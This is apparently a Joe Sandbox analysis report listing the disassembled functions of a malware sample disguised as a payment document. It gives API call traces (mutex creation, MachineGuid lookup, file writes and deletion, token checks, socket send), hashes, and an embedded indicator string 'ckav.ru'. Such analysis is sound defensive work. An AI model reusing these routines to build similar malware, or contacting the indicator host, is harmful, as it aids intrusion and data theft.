Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: cab46f4d188c0a5189c49f3585cfa10eddaab0cbfa80d2b27664b61f9bed3b3c
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: cab46f4d188c0a5189c49f3585cfa10eddaab0cbfa80d2b27664b61f9bed3b3c
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: 18f61375b21b2ca1c3d5cfb75848ec819ade9bcc4ac2f6c13c281ff8ddb16e17
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: 18f61375b21b2ca1c3d5cfb75848ec819ade9bcc4ac2f6c13c281ff8ddb16e17
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
